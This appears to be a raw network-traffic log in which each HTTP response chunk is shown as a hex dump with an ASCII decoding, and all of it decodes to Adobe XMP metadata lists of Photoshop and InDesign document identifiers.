                                                                                                                                                                                    2023-01-05 07:58:10 UTC3373INData Raw: 43 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 44 46 37 45 46 32 44 37 45 30 33 46 32 42 38 37 42 42 30 34 42 30 33 30 30 37 46 41 30 46 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 44 46 42 33 30 37 42 42 36 35 37 46 43 37 41 36 37 39 45 32 37 41 33 36 46 36 34 30 41 41 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 44 46 44 41 35 41 31 37 36 45 41 34 35 36 43 45 31 46 43 34 46 44 42 30 39 36 36 39 43 38 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 45 31 30 33 32 37 43 45 35 42 44 37 41 46 39 41 42 41 31 36 30 39 32 42 35 46 35 34 37 38 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 45 31 33 30 46 36 35 33 35 46 44 45 43 42 30 43 43 33 38 39 43 35 45 31 35 37 39 44 37 44 33 3c 2f 72
                                                                                                                                                                                    Data Ascii: C0</rdf:li> <rdf:li>ADF7EF2D7E03F2B87BB04B03007FA0FF</rdf:li> <rdf:li>ADFB307BB657FC7A679E27A36F640AAF</rdf:li> <rdf:li>ADFDA5A176EA456CE1FC4FDB09669C86</rdf:li> <rdf:li>AE10327CE5BD7AF9ABA16092B5F5478A</rdf:li> <rdf:li>AE130F6535FDECB0CC389C5E1579D7D3</r
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3396INData Raw: 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 38 46 34 41 39 46 33 39 44 44 42 42 46 31 32 37 36 45 30 44 42 31 41 30 43 44 44 31 36 41 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 39 30 38 30 42 44 31 34 31 46 43 41 32 41 34 45 43 32 32 30 42 39 41 45 44 38 36 43 33 33 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 39 30 46 32 32 30 36 38 39 38 39 44 35 30 41 46 39 37 44 45 39 36 39 38 39 44 41 36 42 32 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 39 31 35 45 31 41 31 35 33 46 39 42 46 35 36 46 45 46 30 30 34 35 31 35 42 30 38 36 41 35 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 39 32 44 42 35 39 34 31 37 34 45 34 46 30 44 39 33 42 43 31 34 33 37 30 33 41 46 37 43 38 37 3c 2f 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: df:li> <rdf:li>B8F4A9F39DDBBF1276E0DB1A0CDD16A8</rdf:li> <rdf:li>B9080BD141FCA2A4EC220B9AED86C335</rdf:li> <rdf:li>B90F22068989D50AF97DE96989DA6B24</rdf:li> <rdf:li>B915E1A153F9BF56FEF004515B086A51</rdf:li> <rdf:li>B92DB594174E4F0D93BC143703AF7C87</rdf:li
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3434INData Raw: 37 44 31 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 44 39 41 34 46 36 31 46 45 43 41 34 41 46 32 31 32 41 45 30 35 45 35 31 31 42 46 33 30 44 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 44 39 43 42 33 45 30 31 36 41 32 30 30 42 32 36 41 32 43 46 43 41 43 31 44 37 37 32 33 34 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 44 41 35 42 30 45 41 34 43 31 34 38 32 33 41 41 41 36 31 30 35 42 35 41 32 38 38 41 38 43 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 44 41 36 42 33 30 38 42 43 42 39 33 34 34 41 35 43 45 32 31 36 30 34 45 31 39 41 36 42 34 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 44 41 37 37 34 46 42 46 37 34 38 44 41 31 37 41 43 30 45 31 32 42 36 46 35 44 43 31 38 39 41 3c
                                                                                                                                                                                    Data Ascii: 7D13</rdf:li> <rdf:li>BD9A4F61FECA4AF212AE05E511BF30D4</rdf:li> <rdf:li>BD9CB3E016A200B26A2CFCAC1D772349</rdf:li> <rdf:li>BDA5B0EA4C14823AAA6105B5A288A8CC</rdf:li> <rdf:li>BDA6B308BCB9344A5CE21604E19A6B44</rdf:li> <rdf:li>BDA774FBF748DA17AC0E12B6F5DC189A<
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3506INData Raw: 37 39 37 44 41 42 39 39 42 31 39 30 30 30 32 36 35 46 39 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 39 33 30 31 35 30 37 39 37 30 45 30 38 36 38 43 35 39 43 42 43 38 36 30 36 36 33 39 39 38 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 39 33 38 39 45 33 35 33 32 41 42 34 36 33 30 37 46 38 31 43 45 34 32 32 45 31 39 38 30 46 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 39 33 42 34 33 41 36 43 38 37 45 31 39 32 37 34 41 43 34 31 45 34 34 30 42 34 30 41 39 44 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 39 34 36 32 31 45 33 31 43 35 43 33 43 32 32 35 31 39 35 39 37 44 34 46 41 34 42 42 39 34 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 39 34 36 35 31 46 36 39 38 34 33 33 35 44 36 41
                                                                                                                                                                                    Data Ascii: 797DAB99B19000265F94</rdf:li> <rdf:li>C9301507970E0868C59CBC8606639981</rdf:li> <rdf:li>C9389E3532AB46307F81CE422E1980F9</rdf:li> <rdf:li>C93B43A6C87E19274AC41E440B40A9DE</rdf:li> <rdf:li>C94621E31C5C3C22519597D4FA4BB94A</rdf:li> <rdf:li>C94651F6984335D6A
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3531INData Raw: 3a 6c 69 3e 44 34 34 41 31 42 34 45 31 33 34 32 39 43 41 46 34 44 37 46 45 43 31 44 35 38 41 42 35 41 39 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 34 35 42 43 34 35 35 37 30 36 31 45 31 42 31 37 31 41 30 44 45 31 37 46 43 37 35 36 41 43 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 34 36 32 46 33 33 42 44 32 43 33 33 31 46 44 34 36 39 35 37 41 30 38 32 38 41 34 33 44 31 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 34 37 36 30 37 45 32 34 44 35 37 33 32 44 35 42 42 44 42 44 44 39 46 39 35 31 45 44 33 46 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 34 38 32 35 36 43 38 38 35 30 38 35 41 36 46 39 36 33 30 36 34 30 36 39 38 42 32 43 41 46 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44
                                                                                                                                                                                    Data Ascii: :li>D44A1B4E13429CAF4D7FEC1D58AB5A92</rdf:li> <rdf:li>D45BC4557061E1B171A0DE17FC756AC7</rdf:li> <rdf:li>D462F33BD2C331FD46957A0828A43D15</rdf:li> <rdf:li>D47607E24D5732D5BBDBDD9F951ED3F6</rdf:li> <rdf:li>D48256C885085A6F9630640698B2CAF8</rdf:li> <rdf:li>D
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3571INData Raw: 69 3e 44 39 45 45 44 31 46 34 34 34 37 38 35 32 35 42 33 38 32 45 39 37 46 31 36 42 42 38 34 34 45 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 39 46 43 33 35 37 30 43 37 36 42 38 33 37 45 32 42 46 41 35 31 41 32 43 38 35 32 35 30 32 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 41 30 35 31 34 45 38 30 33 35 46 39 39 43 41 36 32 39 45 32 33 43 44 41 44 43 33 44 39 35 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 41 30 35 43 39 36 41 34 33 44 39 38 35 43 33 42 31 41 30 31 46 44 34 35 39 42 36 38 31 39 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 41 30 41 41 44 46 39 45 31 31 32 38 30 42 34 34 39 32 41 45 45 33 44 31 43 45 33 42 37 37 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 41 30
                                                                                                                                                                                    Data Ascii: i>D9EED1F44478525B382E97F16BB844E1</rdf:li> <rdf:li>D9FC3570C76B837E2BFA51A2C8525024</rdf:li> <rdf:li>DA0514E8035F99CA629E23CDADC3D957</rdf:li> <rdf:li>DA05C96A43D985C3B1A01FD459B68191</rdf:li> <rdf:li>DA0AADF9E11280B4492AEE3D1CE3B773</rdf:li> <rdf:li>DA0
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3633INData Raw: 45 46 33 31 37 34 31 33 31 41 41 37 45 35 36 32 35 46 33 42 31 42 41 34 30 35 39 45 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 35 34 38 34 41 43 33 44 45 38 30 37 45 31 30 32 36 41 42 30 42 32 34 36 30 37 38 30 33 30 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 35 34 43 37 39 39 41 37 33 42 32 32 35 41 45 37 43 46 33 46 30 38 30 43 31 37 36 33 43 41 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 35 35 31 30 45 44 31 33 39 35 44 43 34 43 46 36 32 35 36 37 34 32 32 41 39 35 41 35 30 45 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 35 35 33 31 31 42 36 34 34 45 30 30 36 44 31 37 45 43 34 35 42 37 46 30 35 37 30 33 33 43 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 35 35 38 38 45 45 46
                                                                                                                                                                                    Data Ascii: EF3174131AA7E5625F3B1BA4059E3</rdf:li> <rdf:li>E5484AC3DE807E1026AB0B2460780305</rdf:li> <rdf:li>E54C799A73B225AE7CF3F080C1763CA1</rdf:li> <rdf:li>E5510ED1395DC4CF62567422A95A50E8</rdf:li> <rdf:li>E55311B644E006D17EC45B7F057033C4</rdf:li> <rdf:li>E5588EEF
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3681INData Raw: 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 46 34 32 36 43 32 42 41 42 34 39 36 32 34 45 31 30 42 43 36 43 39 37 31 34 37 32 34 33 31 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 46 34 45 45 33 43 44 42 42 30 32 31 44 32 43 39 45 44 33 43 30 45 42 42 33 34 35 34 44 32 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 46 35 43 46 39 42 41 35 41 36 32 30 34 31 42 35 45 34 45 31 33 42 39 44 32 46 38 46 35 45 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 46 36 38 41 42 33 31 43 34 43 42 33 41 38 37 34 44 39 30 33 46 32 32 46 35 34 34 41 36 45 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 46 37 44 35 41 43 35 30 36 44 36 42 30 37 44 36 34 38 37 38 33 39 32 33 46 41 44 30 38 36 34 3c 2f 72 64 66 3a 6c 69 3e 20
                                                                                                                                                                                    Data Ascii: :li> <rdf:li>EF426C2BAB49624E10BC6C9714724314</rdf:li> <rdf:li>EF4EE3CDBB021D2C9ED3C0EBB3454D29</rdf:li> <rdf:li>EF5CF9BA5A62041B5E4E13B9D2F8F5E7</rdf:li> <rdf:li>EF68AB31C4CB3A874D903F22F544A6E2</rdf:li> <rdf:li>EF7D5AC506D6B07D648783923FAD0864</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3689INData Raw: 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 35 33 43 42 32 30 43 45 43 42 43 41 43 46 46 43 41 36 46 44 33 32 39 35 32 44 31 43 31 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 36 33 32 45 32 30 36 34 44 31 32 31 33 37 39 34 37 36 38 32 30 39 41 44 41 33 30 39 46 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 36 42 45 36 41 33 44 36 45 32 41 32 38 34 31 36 42 37 44 45 37 34 34 34 41 43 33 34 41 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 38 43 32 43 39 43 45 39 31 39 43 45 34 31 44 30 38 43 41 36 31 43 31 33 35 31 44 39 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 39 32 41 35 35 34 42 37 41 37 43 38 31 33 34 41 34 45 32 38 46 41 35 42 39 31 44 45 39 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72
                                                                                                                                                                                    Data Ascii: i> <rdf:li>F453CB20CECBCACFFCA6FD32952D1C13</rdf:li> <rdf:li>F4632E2064D1213794768209ADA309FC</rdf:li> <rdf:li>F46BE6A3D6E2A28416B7DE7444AC34AF</rdf:li> <rdf:li>F48C2C9CE919CE41D08CA61C1351D96B</rdf:li> <rdf:li>F492A554B7A7C8134A4E28FA5B91DE9F</rdf:li> <r
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3713INData Raw: 32 35 38 61 61 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 69 6e 64 64 3a 64 34 30 31 39 61 64 33 2d 63 30 31 30 2d 31 31 65 30 2d 39 37 35 38 2d 39 66 32 66 61 33 32 37 35 36 66 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 69 6e 64 64 3a 64 34 30 31 39 61 64 62 2d 63 30 31 30 2d 31 31 65 30 2d 39 37 35 38 2d 39 66 32 66 61 33 32 37 35 36 66 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 69 6e 64 64 3a 65 37 30 32 38 62 63 63 2d 37 34 38 31 2d 31 31 64 66 2d 62 37 63 61 2d 66 33 36 34 61 39 34 62 62 63 65 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 69 6e 64 64 3a 65
                                                                                                                                                                                    Data Ascii: 258aaf</rdf:li> <rdf:li>adobe:docid:indd:d4019ad3-c010-11e0-9758-9f2fa32756fa</rdf:li> <rdf:li>adobe:docid:indd:d4019adb-c010-11e0-9758-9f2fa32756fa</rdf:li> <rdf:li>adobe:docid:indd:e7028bcc-7481-11df-b7ca-f364a94bbcec</rdf:li> <rdf:li>adobe:docid:indd:e
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3792INData Raw: 2d 61 37 36 64 2d 62 38 65 39 61 30 62 31 30 61 62 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 32 65 37 35 38 63 64 33 2d 64 35 36 38 2d 31 31 65 37 2d 38 32 61 38 2d 63 36 33 61 33 35 33 63 34 33 32 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 32 65 66 66 31 38 66 35 2d 32 31 38 61 2d 31 31 37 62 2d 62 34 63 30 2d 65 66 34 37 30 37 62 30 35 64 32 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 32 66 38 61 34 33 36 35 2d 35 33 35 62 2d 31 31 37 38 2d 61 32 34 63 2d 66 31 30 32 63 35 38 30 64 64 32 37 3c 2f 72 64 66 3a 6c 69 3e
                                                                                                                                                                                    Data Ascii: -a76d-b8e9a0b10ab5</rdf:li> <rdf:li>adobe:docid:photoshop:2e758cd3-d568-11e7-82a8-c63a353c4324</rdf:li> <rdf:li>adobe:docid:photoshop:2eff18f5-218a-117b-b4c0-ef4707b05d2c</rdf:li> <rdf:li>adobe:docid:photoshop:2f8a4365-535b-1178-a24c-f102c580dd27</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3856INData Raw: 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 34 32 33 34 61 38 39 39 2d 63 34 37 65 2d 31 31 37 39 2d 62 32 38 62 2d 38 39 34 33 64 33 34 37 64 62 37 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 34 32 36 30 36 61 62 37 2d 65 62 31 30 2d 31 31 37 37 2d 61 32 39 35 2d 64 36 30 64 39 35 38 39 66 33 38 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 34 32 37 63 32 33 30 30 2d 61 34 31 64 2d 31 31 37 37 2d 61 32 39 30 2d 38 37 66 33 66 35 30 61 33 32 66 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 34 32 64 65 33 37 37 63 2d 63 66 33 31 2d
                                                                                                                                                                                    Data Ascii: id:photoshop:4234a899-c47e-1179-b28b-8943d347db71</rdf:li> <rdf:li>adobe:docid:photoshop:42606ab7-eb10-1177-a295-d60d9589f380</rdf:li> <rdf:li>adobe:docid:photoshop:427c2300-a41d-1177-a290-87f3f50a32fc</rdf:li> <rdf:li>adobe:docid:photoshop:42de377c-cf31-
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3896INData Raw: 66 34 38 39 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 30 37 34 65 31 61 65 2d 32 62 62 31 2d 31 31 37 39 2d 38 64 31 62 2d 61 61 33 33 65 36 31 62 61 31 30 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 30 38 31 34 61 30 66 2d 38 64 33 37 2d 31 31 37 38 2d 38 35 37 63 2d 64 36 61 39 66 34 61 38 66 32 39 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 30 38 33 36 31 64 34 2d 34 66 33 36 2d 31 31 65 37 2d 62 30 63 62 2d 64 64 61 37 38 64 39 32 66 61 31 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62
                                                                                                                                                                                    Data Ascii: f489f</rdf:li> <rdf:li>adobe:docid:photoshop:7074e1ae-2bb1-1179-8d1b-aa33e61ba103</rdf:li> <rdf:li>adobe:docid:photoshop:70814a0f-8d37-1178-857c-d6a9f4a8f29f</rdf:li> <rdf:li>adobe:docid:photoshop:708361d4-4f36-11e7-b0cb-dda78d92fa1e</rdf:li> <rdf:li>adob
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3912INData Raw: 3a 39 61 33 35 35 34 30 38 2d 61 65 63 38 2d 31 31 64 39 2d 38 62 35 37 2d 38 63 61 61 35 33 61 38 34 31 63 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 39 61 37 39 39 36 36 37 2d 62 30 37 36 2d 31 31 64 38 2d 39 38 34 34 2d 66 38 30 31 38 64 30 61 35 31 34 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 39 62 32 33 32 66 34 31 2d 65 39 31 38 2d 31 31 65 34 2d 38 32 64 66 2d 39 34 34 35 31 64 33 37 38 33 33 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 39 62 61 31 38 36 63 39 2d 61 32 35 62 2d 31 31 65 37 2d 38 31 36 33 2d 38 63
                                                                                                                                                                                    Data Ascii: :9a355408-aec8-11d9-8b57-8caa53a841c7</rdf:li> <rdf:li>adobe:docid:photoshop:9a799667-b076-11d8-9844-f8018d0a514e</rdf:li> <rdf:li>adobe:docid:photoshop:9b232f41-e918-11e4-82df-94451d378331</rdf:li> <rdf:li>adobe:docid:photoshop:9ba186c9-a25b-11e7-8163-8c
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3935INData Raw: 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 62 31 31 33 37 32 63 62 2d 66 32 66 35 2d 33 63 34 30 2d 38 35 63 31 2d 65 34 34 61 31 31 65 32 62 31 36 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 62 31 39 62 62 38 63 32 2d 39 66 31 64 2d 31 31 37 37 2d 62 62 66 61 2d 39 36 38 62 61 38 63 37 37 33 30 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 62 31 64 36 32 64 37 39 2d 39 64 33 34 2d 35 66 34 39 2d 39 61 63 32 2d 35 64 63 64 34 65 34 64 65 37 33 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f
                                                                                                                                                                                    Data Ascii: rdf:li>adobe:docid:photoshop:b11372cb-f2f5-3c40-85c1-e44a11e2b169</rdf:li> <rdf:li>adobe:docid:photoshop:b19bb8c2-9f1d-1177-bbfa-968ba8c77300</rdf:li> <rdf:li>adobe:docid:photoshop:b1d62d79-9d34-5f49-9ac2-5dcd4e4de734</rdf:li> <rdf:li>adobe:docid:photosho
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3967INData Raw: 34 34 38 2d 38 62 33 38 2d 32 62 34 33 65 64 63 64 38 39 31 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 65 31 35 31 62 61 65 38 2d 39 66 63 31 2d 31 31 64 61 2d 62 30 62 34 2d 38 34 66 38 31 62 33 62 39 32 61 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 65 31 36 30 66 31 63 33 2d 32 36 34 38 2d 31 31 64 63 2d 61 35 32 37 2d 63 36 64 63 32 30 32 31 34 61 65 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 65 31 38 63 30 66 35 61 2d 39 36 37 38 2d 31 31 37 61 2d 62 62 61 33 2d 65 37 61 64 63 38 61 63 35 63 61 66 3c 2f 72 64 66 3a
                                                                                                                                                                                    Data Ascii: 448-8b38-2b43edcd891c</rdf:li> <rdf:li>adobe:docid:photoshop:e151bae8-9fc1-11da-b0b4-84f81b3b92aa</rdf:li> <rdf:li>adobe:docid:photoshop:e160f1c3-2648-11dc-a527-c6dc20214ae7</rdf:li> <rdf:li>adobe:docid:photoshop:e18c0f5a-9678-117a-bba3-e7adc8ac5caf</rdf:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3983INData Raw: 44 37 34 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 30 44 46 44 43 46 34 37 32 36 46 42 44 44 31 31 38 46 39 33 42 43 44 31 42 37 33 44 39 33 32 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 30 45 31 34 30 33 38 42 38 39 36 37 44 43 31 31 41 36 34 31 42 38 44 44 41 46 43 39 42 36 33 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 30 45 34 30 36 41 46 34 42 36 38 34 45 31 31 31 42 34 39 39 44 30 46 37 42 43 35 43 30 30 42 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 30 45 37 41 39 39 46 39 37 33 41 45 44 45 31 31 38 41 31 33 45 35 44 35 30 34 36 33 30 39 44 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 30 45 41 33 32 35 42 38
                                                                                                                                                                                    Data Ascii: D745</rdf:li> <rdf:li>uuid:0DFDCF4726FBDD118F93BCD1B73D932E</rdf:li> <rdf:li>uuid:0E14038B8967DC11A641B8DDAFC9B63F</rdf:li> <rdf:li>uuid:0E406AF4B684E111B499D0F7BC5C00B8</rdf:li> <rdf:li>uuid:0E7A99F973AEDE118A13E5D5046309DB</rdf:li> <rdf:li>uuid:0EA325B8
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3991INData Raw: 69 64 3a 32 38 34 44 33 34 31 43 33 37 34 36 44 45 31 31 38 45 30 35 45 30 30 41 39 32 34 44 38 43 43 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 38 35 43 32 42 43 34 36 41 35 30 44 45 31 31 41 31 42 41 44 45 43 41 36 33 32 45 36 39 36 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 38 37 43 39 42 30 38 32 32 37 42 45 32 31 31 42 33 30 36 43 38 35 31 30 31 30 35 36 31 45 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 38 42 36 35 37 38 32 38 43 34 43 31 31 44 42 38 44 35 41 41 31 37 30 31 30 39 33 41 46 34 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 38 43 38 46 31 30 36 38 46 36 36 31 31 44 41 41 45 30 31 46 36 34 35 38 46 37 31 46 30 43 37
                                                                                                                                                                                    Data Ascii: id:284D341C3746DE118E05E00A924D8CC5</rdf:li> <rdf:li>uuid:285C2BC46A50DE11A1BADECA632E6966</rdf:li> <rdf:li>uuid:287C9B08227BE211B306C851010561EE</rdf:li> <rdf:li>uuid:28B657828C4C11DB8D5AA1701093AF4F</rdf:li> <rdf:li>uuid:28C8F1068F6611DAAE01F6458F71F0C7
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4031INData Raw: 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 42 38 32 38 45 46 30 44 33 37 36 44 44 31 31 41 33 35 32 42 43 30 31 39 45 38 31 46 42 34 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 42 41 34 30 32 45 46 38 30 44 34 44 45 31 31 39 36 39 39 46 42 41 45 41 36 33 44 41 34 42 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 42 42 35 32 43 43 43 42 42 45 31 44 45 31 31 42 42 45 37 44 41 39 46 42 34 36 36 44 42 41 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 43 31 33 31 33 33 31 38 34 44 46 44 45 31 31 42 43 46 37 38 34 41 45 42 30 37 43 34 31 34 34 3c 2f 72 